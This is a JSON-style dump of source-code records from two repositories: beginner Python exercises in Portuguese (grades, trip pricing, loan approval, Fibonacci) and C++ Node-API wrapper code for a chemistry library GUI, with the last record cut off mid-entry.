"blob_id": "6ab5ef4b3ae02f1ba582820887b8fdc5bcb3589f",
"content_id": "ab28b886213a76330df638ebc5e23618e2f6f904",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 582,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 20,
"path": "/ex040.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "print('Digite as notas de sua prova Bimestral e sua Avaliação Somativa.')\r\n\r\nsomativa = float(input('Avaliação Somativa: '))\r\nbimestral = float(input('Prova Bimestral: '))\r\n\r\nmedia = (somativa + bimestral)/2\r\n\r\nif media >= 7:\r\n print('\\033[1;32mAPROVADO\\033[1;32m')\r\n print('Sua média foi de {:.1f}'.format(media))\r\n\r\n\r\nelif media < 5:\r\n print('\\033[1;31mREPROVADO\\033[1;31m')\r\n print('Sua média foi de {:.1f}'.format(media))\r\n\r\n\r\nelif media >= 5 and media < 7:\r\n print('\\033[1;36mRECUPERAÇÃO\\033[1;36m')\r\n print('Sua média foi de {:.1f}'.format(media))\r\n"
},
{
"alpha_fraction": 0.5839080214500427,
"alphanum_fraction": 0.6137930750846863,
"avg_line_length": 37,
"blob_id": "2e2a2b47078ff7ef98eda9077aea45fb1c57553a",
"content_id": "476e47b2e8f49f629e4de1e080118bd4233a79fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 440,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 11,
"path": "/ex031.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "distancia = float(input('Qual a distância de sua viagem ? '))\r\n\r\nif distancia <= 200:\r\n preco = distancia * 0.50\r\n print('-----VOCÊ IRA COMEÇAR UMA VIAGEM-----')\r\n print('Sua viagem ira custar um total de R${:.2f}'.format(preco))\r\n\r\nelse:\r\n preco2 = distancia * 0.45\r\n print('-----VOCÊ IRA COMEÇAR UMA VIAGEM COM UM VALOR PROMOCIONAL-----')\r\n print('Sua viagem ira custar um total de R${:.2f}'.format(preco2))\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5614224076271057,
"alphanum_fraction": 0.5980603694915771,
"avg_line_length": 33.69230651855469,
"blob_id": "23a188628c55f834233c2619f028567cd91dc747",
"content_id": "bc61a1cb658749aa85c3a67cb1c29a6a456ba16b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 933,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 26,
"path": "/ex056.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "soma_idade = 0\r\nmedia_idade = 0\r\nnome_velho = ''\r\nmaior_idade_homem = 0\r\ntotal_mulheres20 = 0\r\n\r\nfor p in range(1, 5):\r\n print('\\033[1;35m-----{}ª Pessoa-----'.format(p))\r\n nome = str(input('\\033[1;97mNome: ')).strip()\r\n idade = int(input('Idade: '))\r\n sexo = str(input('Sexo [M/F]')).lower()\r\n soma_idade = soma_idade + idade\r\n if p == 1 and sexo in 'm':\r\n maior_idade_homem = idade\r\n nome_velho = nome\r\n if sexo in 'm' and idade > maior_idade_homem:\r\n maior_idade_homem = idade\r\n nome_velho = nome\r\n if sexo in 'f' and idade < 20:\r\n total_mulheres20 = total_mulheres20 + 1\r\nprint('')\r\n\r\nmedia_idade = soma_idade / 4\r\nprint('A média de idade é {:.0f} anos.'.format(media_idade))\r\nprint('O Nome do homem mais velho é {} e ele tem {} anos.'.format(nome_velho, maior_idade_homem))\r\nprint('A quantidade de mulheres com idade abaixo de 20 é {}.'.format(total_mulheres20))\r\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5148809552192688,
"avg_line_length": 23.846153259277344,
"blob_id": "a2a4686642ff87131ef19517e6eab1579f73bd8e",
"content_id": "2dce8a21a027e8aff581b8459d6e961d72acad04",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 339,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 13,
"path": "/ex055.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "maior = 0\r\nmenor = 0\r\n\r\nfor p in range(1, 6):\r\n peso = float(input('Qual o peso da {}° Pessoa? '.format(p)))\r\n if p == 1:\r\n maior = peso\r\n menor = peso\r\n if peso > maior:\r\n maior = peso\r\n if peso < menor:\r\n menor = peso\r\nprint('O maior peso é {}Kg, e o menor peso é {}Kg.'.format(maior, menor))\r\n"
},
{
"alpha_fraction": 0.5714285969734192,
"alphanum_fraction": 0.6722113490104675,
"avg_line_length": 46.47618865966797,
"blob_id": "35bcce67cea8fb5f3158d2a19feba801bc04354f",
"content_id": "521b43dea501c3753544886ac3fe168a4abd4aed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1029,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 21,
"path": "/ex036.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "print('\\033[1;32m-=-\\033[1;32m' * 11)\r\nprint('\\033[1;97m APROVADOR DE FINANCIAMENTOS\\033[1;97m')\r\nprint('\\033[1;32m-=-\\033[1;32m' * 11)\r\n\r\nvalor_casa = float(input('\\033[1;96mQual o valor da casa? R$'))\r\nvalor_salario = float(input('\\033[1;96mQuanto você recebe de salário? R$'))\r\nquantidade_anos = int(input('\\033[1;96mQuantos anos você ira demorar para pagar a casa? '))\r\n\r\nvalor_parcela = valor_casa / quantidade_anos / 12\r\nquantidade_parcelas = quantidade_anos/12\r\nvalor_desconto = valor_salario * 30/100\r\n\r\nif valor_parcela > (valor_salario-valor_desconto):\r\n print('')\r\n print('\\033[1;31mNEGADO')\r\n print('\\033[0;97mPedimos desculpas, mas o valor mensal excede 30% do seu salário!')\r\n print('\\033[0;97mO valor de cada parcela seria de R${:.2f} por mês durante {:.0f} anos'.format(valor_parcela, quantidade_anos))\r\nelse:\r\n print('')\r\n print('\\033[1;32mAPROVADO')\r\n print('\\033[0;97mVocê ira pagar uma valor de R${:.2f} por mês durante {:.0f} anos!'.format(valor_parcela, quantidade_anos))\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5376344323158264,
"alphanum_fraction": 0.5698924660682678,
"avg_line_length": 16.600000381469727,
"blob_id": "fb6f145219885860ecb3936e5d2cf0bdf82b4893",
"content_id": "deb5c02ff339dd08a45955fac376296469afb5dc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 186,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 10,
"path": "/ex063.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "proximo = 0\r\nanterior = 0\r\n\r\nwhile(proximo < 50):\r\n print(proximo)\r\n proximo = proximo + anterior\r\n anterior = proximo - anterior\r\n\r\n if proximo == 0:\r\n proximo =+ 1\r\n"
}
] | 51 |
ChaoShuChina/Spark1
|
https://github.com/ChaoShuChina/Spark1
|
276a5384a04dde2b96c579c66ed814c10184770c
|
c2d35159d35d2615acf0a275c4858b9c0e8d465b
|
d199cf6896abfea99beb907eb1f88ac52325cd3b
|
refs/heads/master
| 2021-01-20T19:50:14.082142 | 2016-06-22T03:33:31 | 2016-06-22T03:33:31 | 61,686,115 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5652173757553101,
"alphanum_fraction": 0.5942028760910034,
"avg_line_length": 45,
"blob_id": "f686bb43356b2b22df74b0d0526d32c42c545edc",
"content_id": "61e1429b1b2a91a1867436ad399fcb33eebd31c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 690,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 15,
"path": "/sparktest.py",
"repo_name": "ChaoShuChina/Spark1",
"src_encoding": "UTF-8",
"text": "from pyspark import SparkConf,SparkContext\nconf = SparkConf().setMaster('local').setAppName(\"my app\")\nsc = SparkContext(conf = conf)\nrdd = sc.textFile(\"/home/chao-shu/1spark/wordcot.txt\")\nwords = rdd.flatMap(lambda x : x.split(\" \"))\n# print words.collect()\nresult = words.map(lambda x:(x,1)).reduceByKey(lambda x,y:x+y)\nprint result.collect()\nmm = sc.parallelize([(\"a\",7),(\"b\",4),(\"c\",9),(\"a\",110),(\"c\",12)])\nprint mm.collect()\nsumCount = mm.combineByKey((lambda x:(x,1)),\n (lambda x,y:(x[0] + y,x[1] + 1)),\n (lambda x,y:(x[0] + y[0],x[1] + y[1])))\nprint sumCount.collect()\nsumCount.map(lambda key,xy:(key,xy[0]/xy[1])).collect()\n"
}
] | 1 |
MichalxPZ/HyperNews-Portal
|
https://github.com/MichalxPZ/HyperNews-Portal
|
55c195fc3a26cef3a63f608325b569e0e51a28a9
|
967b84f2ebd6d8bdb164c2940404a7f3eaba6170
|
cf57bfa05223d7b0305895beb22265da4368a462
|
refs/heads/master
| 2023-03-24T18:26:07.408988 | 2021-03-23T00:07:32 | 2021-03-23T00:07:32 | 311,786,624 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5814606547355652,
"alphanum_fraction": 0.5858747959136963,
"avg_line_length": 26.09782600402832,
"blob_id": "2c8698e90bf3f66b5f653c081035cb6be9526bc1",
"content_id": "7d8fbdb45b12c6be4a681c55a61ea9654ae4ab86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2492,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 92,
"path": "/news/views.py",
"repo_name": "MichalxPZ/HyperNews-Portal",
"src_encoding": "UTF-8",
"text": "import json\nfrom datetime import datetime\nfrom random import randint\n\nimport django\nfrom django.conf import settings\nfrom django.views import View\nfrom django.shortcuts import render, redirect\nfrom django.views.decorators.csrf import csrf_exempt\n\n\n# Create your views here.\ndef index(request):\n return redirect('/news/')\n\n\ndef mainpage(request):\n\n def simple_date_fun(date):\n return datetime.strptime(date, \"%Y-%m-%d %H:%M:%S\").strftime(\"%Y-%m-%d\")\n\n def sort_news(sorted_news):\n date_table = []\n for i in sorted_news:\n i['date'] = simple_date_fun(i['created'])\n if simple_date_fun(i['created']) not in date_table:\n date_table.append(simple_date_fun(i['created']))\n return date_table\n\n\n q = request.GET.get('q')\n if q == None:\n q = ''\n\n with open(settings.NEWS_JSON_PATH, 'r') as f:\n data_from_json = json.load(f)\n sorted_news = sorted(data_from_json, key=lambda i: i['created'], reverse=True)\n\n final_news = []\n\n for i in sorted_news:\n if q in i['title']:\n final_news.append(i)\n date_table = sort_news(final_news)\n return render(request, 'mainpage.html', {'sorted_news': final_news, 'date_table': date_table})\n\n\ndef news(request, numer):\n\n with open(settings.NEWS_JSON_PATH, 'r') as f:\n data_from_json = json.load(f)\n\n for i in data_from_json:\n\n if i['link']==numer:\n title = i['title']\n created = i['created']\n text = i['text']\n return render(request, 'news.html', {'title': title, 'created': created, 'text': text})\n\n raise django.http.Http404(\"Not found\")\n\n\ndef create(request):\n\n title = request.POST.get('title')\n text = request.POST.get('text')\n post_date = datetime.now().replace(microsecond=0)\n\n with open(settings.NEWS_JSON_PATH, 'r') as f:\n date_from_json = json.load(f)\n links = []\n link = 1\n\n for i in date_from_json:\n links.append(i['link'])\n while link in links:\n link = randint(1, 10000)\n\n new_article = {'created': str(post_date), 'text': text, 'title': title, 'link': link}\n\n if new_article['title'] != None:\n date_from_json.append(new_article,)\n\n\n with open(settings.NEWS_JSON_PATH, 'w') as f:\n f.write(json.dumps(date_from_json))\n\n if title == None:\n return render(request, 'create.html')\n else:\n return redirect('/news/')"
},
{
"alpha_fraction": 0.703157901763916,
"alphanum_fraction": 0.703157901763916,
"avg_line_length": 35.61538314819336,
"blob_id": "015abb3e61b7cf3308e7c7cc553bc3ca8dca0c33",
"content_id": "b2452cc6d92e84a9fe83d8967f1ce0c31628b1c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 475,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 13,
"path": "/news/urls.py",
"repo_name": "MichalxPZ/HyperNews-Portal",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('', views.index, name = 'index'),\n path('news/', views.mainpage, name = 'mainpage'),\n path('news/<int:numer>/', views.news, name = 'news'),\n path('news/create/', views.create, name = 'create'),\n]\nurlpatterns += static(settings.STATIC_URL)\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)"
},
{
"alpha_fraction": 0.7030878663063049,
"alphanum_fraction": 0.7125890851020813,
"avg_line_length": 16.45833396911621,
"blob_id": "8386c7b91f5c8366cea0353f128c83a92fd6ddc7",
"content_id": "fd1649d1c162f0950aa1a156918ccb9cff2c0768",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 421,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 24,
"path": "/README.md",
"repo_name": "MichalxPZ/HyperNews-Portal",
"src_encoding": "UTF-8",
"text": "# HyperNews-Portal\nJetBrains Academy project course \nWeb App created with HTML, CSS and Django \nProvides users with features to search for news and create their own ones \n\n### Requirements\n1.Python \n2.Django\n\n### Running \n\n```commandline\npython manage.py runserver\n```\n\n### How does it look?\nMain screen: \n\n\nSearch: \n\n\nCreate news: \n\n\n\n"
}
] | 3 |
scarlettajulia/mining-insta
|
https://github.com/scarlettajulia/mining-insta
|
ae6f24559f2ad26feb55d5e1257ff9064604bafe
|
bd90483c220661ee36f5e5f015b518605e568040
|
fe896c388bef9d5616e74b23451f7ef9cb9eb2d4
|
refs/heads/master
| 2021-01-23T16:12:59.385227 | 2017-09-07T16:08:29 | 2017-09-07T16:08:29 | 102,732,393 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6514575481414795,
"alphanum_fraction": 0.6603295207023621,
"avg_line_length": 26.20689582824707,
"blob_id": "16e461fae242a59730af84dd10efff88dbd0ad71",
"content_id": "387f414f1853a05eb84e3125c65b9f05547a833d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1578,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 58,
"path": "/src/examples/user_followers_level.py",
"repo_name": "scarlettajulia/mining-insta",
"src_encoding": "UTF-8",
"text": "from InstagramAPI import InstagramAPI\nimport time\nimport json\n\nlevel = 0;\nqueue_of_user = [('484345208','ramosj_noah')]\nlist_of_added_user = []\n\noutfile = open('follower_level.txt', 'w')\nuserlist_outfile = open('all_userid.txt', 'w')\n\ndef getFollowerFromUser(userId):\n\tfollower_json = []\n\tfollower = []\n\tnext_max_id = True\n\twhile next_max_id:\n\t #first iteration hack\n\t if next_max_id == True: next_max_id=''\n\t time.sleep(5)\n\t _ = API.getUserFollowers(userId,maxid=next_max_id)\n\t follower_json.extend ( API.LastJson.get('users',[]))\n\t next_max_id = API.LastJson.get('next_max_id','')\n\tfor f in follower_json:\n\t\tfollower.append(f['username'])\n\t\t#print f['username']\n\t\tif ((f['pk'], f['username']) not in queue_of_user) and (f['username'] not in list_of_added_user):\n\t\t\tqueue_of_user.append((f['pk'], f['username']))\n\treturn follower\n\nusername = ''\npwd = ''\nuser_id = ''\n\nAPI = InstagramAPI(username,pwd)\nAPI.login()\n\nAPI.getUsernameInfo(user_id)\nAPI.LastJson\n\nwhile level<3:\n\tprint level\n\tcopy_of_queue = list(queue_of_user)\n\t#print copy_of_queue\n\tfor (userid, username) in copy_of_queue:\n\t\t#print user\n\t\tif username not in list_of_added_user:\n\t\t\tfollower = getFollowerFromUser(userid)\n\t\t\tlist_of_added_user.append(username)\n\t\t\tuserlist_outfile.write(\"%s\\n\" % username)\n\t\t\toutfile.write(\"%s\" % username)\n\t\t\toutfile.write(\":\")\n\t\t\toutfile.write(\"\\n\")\n\t\t\tfor f in follower:\n\t\t\t\toutfile.write(\"%s\\n\" % f)\n\t\t\t\tif ((level == 2) and (f not in list_of_added_user)):\n\t\t\t\t\tuserlist_outfile.write(\"%s\\n\" % f)\n\t\tqueue_of_user.remove((userid, username))\n\tlevel = level + 1\n"
},
{
"alpha_fraction": 0.5493826866149902,
"alphanum_fraction": 0.5493826866149902,
"avg_line_length": 11.538461685180664,
"blob_id": "6befbf1ddad170a6f1c7ab580dad184f84b4f8dd",
"content_id": "42af9bfa1e3c62b5731ff39fc49cc4c008b5c434",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 162,
"license_type": "permissive",
"max_line_length": 29,
"num_lines": 13,
"path": "/src/examples/read_files.py",
"repo_name": "scarlettajulia/mining-insta",
"src_encoding": "UTF-8",
"text": "import json\n\nf = open('follower.txt', 'r')\nx = f.read().split('\\n')\n\nprint x\n\na = 'a'\ndata = {}\njson_data = json.dumps(data)\ndata[a] = ['b', 'c', 'd']\n\nprint data"
},
{
"alpha_fraction": 0.6620776057243347,
"alphanum_fraction": 0.6758447885513306,
"avg_line_length": 18.975000381469727,
"blob_id": "534e4fc6da36caad3cceb2427bedc6b21d02d1ce",
"content_id": "ae14fc8af543d871d745f83a973a4cee46048890",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 799,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 40,
"path": "/src/examples/user_followers.py",
"repo_name": "scarlettajulia/mining-insta",
"src_encoding": "UTF-8",
"text": "from InstagramAPI import InstagramAPI\nimport time\nimport json\nfrom datetime import datetime\n\nusername = ''\npwd = ''\nuser_id = ''\n\nlevel = 3;\n\nAPI = InstagramAPI(username,pwd)\nAPI.login()\n\nAPI.getUsernameInfo(user_id)\nAPI.LastJson\nfollower = []\nnext_max_id = True\nwhile next_max_id:\n print next_max_id\n #first iteration hack\n if next_max_id == True: next_max_id=''\n _ = API.getUserFollowers('4133879197',maxid=next_max_id)\n follower.extend ( API.LastJson.get('users',[]))\n next_max_id = API.LastJson.get('next_max_id','')\n\nfor f in follower:\n\tprint f['username']\n\nlen(follower)\nunique_follower= {\n f['pk'] : f\n for f in follower\n}\nlen(unique_follower)\n\nwith open('follower.txt', 'w') as outfile:\n json.dump(unique_follower, outfile)\n\n#outfile = open('follower.txt', 'w')\n"
}
] | 3 |
Mo0nka/Contador-em-python
|
https://github.com/Mo0nka/Contador-em-python
|
0e44ba7e98d746ccea20f4a390f9d7ecd217596a
|
17842e092244d50c58bf1b69983f029ce3173d4d
|
7c8d519662f8227681af1e4a2627fc8c31893be9
|
refs/heads/main
| 2023-01-03T17:25:03.882441 | 2020-10-28T18:39:30 | 2020-10-28T18:39:30 | 308,108,673 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8035714030265808,
"alphanum_fraction": 0.8035714030265808,
"avg_line_length": 27,
"blob_id": "1520bbc337f70c648899860a4929592cb33730c8",
"content_id": "c2c5a4a6207a0b7e5edd58b5cbb52325e09e95b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 56,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Mo0nka/Contador-em-python",
"src_encoding": "UTF-8",
"text": "# Contador-em-python\nSimples contador feito com Python.\n"
},
{
"alpha_fraction": 0.44417476654052734,
"alphanum_fraction": 0.47653722763061523,
"avg_line_length": 31.94444465637207,
"blob_id": "6c4e8cbe278496432c8f3326278f487fdf6c06a6",
"content_id": "7fa8a8ce511a12c86dc3b0df8f5853146d9a8d67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1239,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 36,
"path": "/contador V1.py",
"repo_name": "Mo0nka/Contador-em-python",
"src_encoding": "UTF-8",
"text": "#Unidades de tempo para fazer a contagem.\r\nmilesimos = 0\r\nsegundos = 0\r\nminutos = 0\r\nhoras = 0\r\ndias = 0\r\n\r\n#Começa a contar\r\nwhile True:\r\n milesimos += 1\r\n #print (str(milesimos) + ' milésimos.')\r\n \r\n #Se 'milesimos' for igual a 9_000_000, ele adiciona mais um em 'segundos'.\r\n if milesimos == 9_000_000:\r\n milesimos = 0\r\n segundos += 1\r\n print (str(segundos) + ' segundos.')\r\n\r\n #Se 'segundos' for igual a 60, ele adiciona mais um a 'minutos'.\r\n if segundos == 60:\r\n segundos = 0\r\n minutos += 1\r\n print ('\\n\\t' + str(minutos) + ' minutos\\n')\r\n \r\n #Se 'minutos' for igual a 60, ele adiciona mais um a 'horas'.\r\n if minutos == 60:\r\n minutos = 0\r\n horas += 1\r\n print ('\\n\\t' + str(horas) + ' horas\\n')\r\n \r\n #Se 'horas' for igual a 24, ele adiciona mais um a 'dias'.\r\n #Provavelmente niguém vai passar um dia com isso funcionando para ver se funciona realmente.\r\n if horas == 24:\r\n horas = 0\r\n dias += 1\r\n print ('\\n\\t' + str(dias) + ' dias\\n')\r\n \r\n"
}
] | 2 |
LanceKnight/BCL-GUI
|
https://github.com/LanceKnight/BCL-GUI
|
1b78895e6ea478306e5741952908dc901684fbb5
|
bf887d877994ffe40c0a313d4e9ece9d22c1857c
|
9d96ef2812e069111f306719d8d8a3708d2f23c9
|
refs/heads/master
| 2022-12-22T13:21:37.833005 | 2019-09-23T22:08:36 | 2019-09-23T22:08:36 | 210,392,182 | 0 | 0 | null | 2019-09-23T15:39:29 | 2019-09-23T22:08:39 | 2022-12-10T03:27:31 |
JavaScript
|
[
{
"alpha_fraction": 0.7123287916183472,
"alphanum_fraction": 0.7191780805587769,
"avg_line_length": 17.125,
"blob_id": "f2d0d93f463c48c662edf70fb59ac556e8fb97b7",
"content_id": "22e47223084d4ebaf4ab85c8b07b7f195c10a41e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 146,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 8,
"path": "/README.md",
"repo_name": "LanceKnight/BCL-GUI",
"src_encoding": "UTF-8",
"text": "\nTo run the demo:\n\nInstall NodeJS, and enter command:\n\n npm start\n\n\n\n"
},
{
"alpha_fraction": 0.7682926654815674,
"alphanum_fraction": 0.7682926654815674,
"avg_line_length": 26.66666603088379,
"blob_id": "05dc931f312cd55e57b51126eacc5c86d2acfb39",
"content_id": "a814dfe0fb78f8249487c17e566ce919f8d8a24e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 82,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 3,
"path": "/src/cppsrc/CPPconnector/README.txt",
"repo_name": "LanceKnight/BCL-GUI",
"src_encoding": "UTF-8",
"text": "This is a tool for connecting C++ codes with the application.\n\n-Yunchao(Lance) Liu"
},
{
"alpha_fraction": 0.7387387156486511,
"alphanum_fraction": 0.7387387156486511,
"avg_line_length": 12.875,
"blob_id": "055c45779e01ef0944ce7d6ab7ced65e3243b0ca",
"content_id": "e03208d98e2351261ec7b12b77d97db4f728e3d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 111,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 8,
"path": "/src/cppsrc/CPPconnector/include/CPPconnector.h",
"repo_name": "LanceKnight/BCL-GUI",
"src_encoding": "UTF-8",
"text": "#ifndef CPP_CONNECTOR_H\n#define CPP_CONNECTOR_H\n#include <string>\n\n\nstd::string get_output(int input);\n\n#endif\n"
},
{
"alpha_fraction": 0.6812366843223572,
"alphanum_fraction": 0.6886993646621704,
"avg_line_length": 21.33333396911621,
"blob_id": "82b3527ae5e8e7f2a7ff9cfeaf610e6e688a9b17",
"content_id": "f69c3748ebd5fa201db47de4bf364f237b0c8758",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 938,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 42,
"path": "/src/cppsrc/CPPconnector/main_CPPconnector_backup.cpp",
"repo_name": "LanceKnight/BCL-GUI",
"src_encoding": "UTF-8",
"text": "#include <CPPconnector.h>\n//#include <mathLibrary.h>\n#include <napi.h>\n\n\nstd::string get_from_shared_library(int input){\n std::string result = get_output(input);\n //fibonacci_init(1, 1);\n return result;//\"Hello\";\n}\n\nNapi::String wrapped_get_from_shared_library(const Napi::CallbackInfo& info) \n{\n Napi::Env env = info.Env();\n if(info.Length()<1||!info[0].IsNumber()){\n\tNapi::TypeError::New(env, \"one number is expected\").ThrowAsJavaScriptException();\n }\n Napi::Number input = info[0].As<Napi::Number>();\n Napi::String returnValue = Napi::String::New(env, get_from_shared_library(input.Int32Value()));\n \n return returnValue;\n}\n\nNapi::Object Init(Napi::Env env, Napi::Object exports) \n{\n exports.Set(\n\"hello\", Napi::Function::New(env, wrapped_get_from_shared_library)\n );\n \n return exports;\n}\n\nNapi::Object InitAll(Napi::Env env, Napi::Object exports) {\n return Init(env, exports);\n}\n\n\n\n\n\n\nNODE_API_MODULE(testaddon, InitAll)\n"
},
{
"alpha_fraction": 0.7144666314125061,
"alphanum_fraction": 0.7201645970344543,
"avg_line_length": 28.25,
"blob_id": "18fd20f49a392a6028b5b3378e98490b6d6d8c11",
"content_id": "75bce28c9e1accee0fa0b1aee0cd467279701aef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3159,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 108,
"path": "/src/cppsrc/CPPconnector/main_CPPconnector.cpp",
"repo_name": "LanceKnight/BCL-GUI",
"src_encoding": "UTF-8",
"text": "#include <CPPconnector.h>\n#include <napi.h>\n\n\nstd::string &get_available_properties_from_bcl(){\n std::string result = bcl::chemistry::LigandDesignHelper::GetAvailableProperties();\n return result;\n}\n\n\nstd::string &get_available_predictions_from_bcl(){\n std::string result = bcl::chemistry::LigandDesignHelper::GetAvailablePredictions();\n return result;\n}\n\n\nvoid set_jar_directory_from_bcl(const std::string &JAR_FILE_DIR){\n bcl::chemistry::LigandDesignHelper::SetJarDirectory(JAR_FILE_DIR);\n}\n\nstd::string calculate_properties_from_bcl(const std::string &MOLECULE, const std::string &PROPERTIES){\t\n bcl::chemistry::LigandDesignHelper::CalculateProperties(const std::string &MOLECULE, const std::string &PROPERTIES);\n}\n\nstd::string process_molecule_from_bcl(const std::string &MOLECULE, const std::string &DESCRIPTORS){\n\tbcl::chemistry::LigandDesignHelper::ProcessMolecule(const std::string &MOLECULE, const std::string &PROPERTIES);\n}\n\n\nNapi::String wrapped_get_available_properties_from_bcl(const Napi::CallbackInfo& info) \n{\n Napi::Env env = info.Env();\n Napi::String returnValue = Napi::String::New(env, get_available_properties_from_bcl());\n \n return returnValue;\n}\n\n\nNapi::String wrapped_get_available_predictions_from_bcl(const Napi::CallbackInfo& info) \n{\n Napi::Env env = info.Env();\n Napi::String returnValue = Napi::String::New(env, get_available_predictions_from_bcl());\n \n return returnValue;\n}\n\n\nNapi::String wrapped_calculate_properties_from_bcl(const Napi::CallbackInfo& info) \n{\n Napi::Env env = info.Env();\n if(info.Length()<2||!info[0].IsString()||!info[1].IsString()){\n\tNapi::TypeError::New(env, \"two strings are expected\").ThrowAsJavaScriptException();\n }\n Napi::String input1 = info[0].As<Napi::String>();\n Napi::String input2 = info[1].As<Napi::String>();\n\n Napi::String return_value = Napi::String::New(env, calculate_properties_from_bcl(input1.String(), input2.String()));\n\n \n return return_value;\n}\n\n\nNapi::String wrapped_process_molecule_from_bcl(const Napi::CallbackInfo& info) \n{\n Napi::Env env = info.Env();\n if(info.Length()<2||!info[0].IsString()||!info[1].IsString()){\n\tNapi::TypeError::New(env, \"two strings are expected\").ThrowAsJavaScriptException();\n }\n Napi::String input1 = info[0].As<Napi::String>();\n Napi::String input2 = info[1].As<Napi::String>();\n\n Napi::String return_value = Napi::String::New(env, process_molecule_from_bcl(input1.String(), input2.String()));\n\n \n return return_value;\n}\n\nNapi::Object Init(Napi::Env env, Napi::Object exports) \n{\n exports.Set(\n\"get_available_properties_from_bcl\", Napi::Function::New(env, wrapped_get_available_properties_from_bcl)\n );\n\n exports.Set(\n\"get_available_predictions_from_bcl\", Napi::Function::New(env, wrapped_get_available_predictions_from_bcl)\n );\n\n exports.Set(\n\"calculate_properties_from_bcl\", Napi::Function::New(env, wrapped_calculate_properties_from_bcl)\n );\n\n exports.Set(\n\"process_molecule_from_bcl\", Napi::Function::New(env, wrapped_process_molecule_from_bcl)\n ); \n return exports;\n}\n\nNapi::Object InitAll(Napi::Env env, Napi::Object exports) {\n return Init(env, exports);\n}\n\n\n\n\n\n\nNODE_API_MODULE(testaddon, InitAll)\n"
},
{
"alpha_fraction": 0.48905110359191895,
"alphanum_fraction": 0.4905109405517578,
"avg_line_length": 31.619047164916992,
"blob_id": "8c5c73f18ff9f5be30cae0e96a1df8dbb9dc24cb",
"content_id": "2a2dd7863bf1454b66a13c93910bc9d5143f8ed0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 685,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 21,
"path": "/src/cppsrc/CPPconnector/binding.gyp",
"repo_name": "LanceKnight/BCL-GUI",
"src_encoding": "UTF-8",
